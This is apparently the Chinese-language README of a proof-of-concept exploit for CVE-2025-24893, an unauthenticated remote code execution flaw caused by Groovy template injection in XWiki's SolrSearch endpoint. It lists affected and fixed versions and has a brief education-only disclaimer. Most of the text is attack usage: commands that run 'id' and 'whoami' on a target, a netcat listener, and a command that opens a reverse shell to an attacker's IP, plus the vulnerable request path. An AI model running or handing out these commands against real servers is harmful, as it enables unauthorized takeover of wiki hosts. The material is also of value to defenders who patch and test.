
针对 XWiki SolrSearch 的未授权 RCE PoC (CVE-2025-24893)。命令执行 + 反弹Shell。
针对 XWiki SolrSearch 的未授权 RCE PoC (CVE-2025-24893)。命令执行 + 反向 Shell。
针对 XWiki SolrSearch 模板注入导致未授权远程代码执行的概念验证。
已在 XWiki Debian 15.10.8(修复版本:15.10.11 / 16.4.1 / 16.5.0RC1)上测试通过。
⚠️ 仅用于教育目的。请勿在未经授权或明确许可的系统上运行。
/xwiki/bin/get/Main/SolrSearch 发送精心构造的 Groovy 载荷。pip install requests
运行脚本时指定目标主机(及可选路径)。
执行基本命令:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
启动反向 Shell:
# 在攻击者机器上
nc -lvnp 4444
# 在 PoC 中
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <攻击者IP> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...